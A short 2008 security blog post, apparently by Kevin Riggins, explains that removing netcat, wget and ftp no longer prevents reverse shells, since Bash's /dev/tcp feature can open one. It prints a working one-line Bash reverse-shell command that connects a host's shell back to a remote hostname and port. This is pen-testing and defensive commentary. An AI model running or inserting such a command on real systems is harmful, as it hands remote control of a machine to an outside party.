Bash based reverse shell wickedness

by kriggins on April 17, 2008

ShellNeohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc... and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins

Share and Enjoy:
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google Bookmarks

Tagged as: pen testing, reverse shell, Web App Testing

{ 1 trackback }

Protecting against reverse shell wickedness… « Infosec Ramblings
April 21, 2008 at 12:29 pm

{ 0 comments… add one now }

Leave a Comment

You can use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Previous post:

Next post: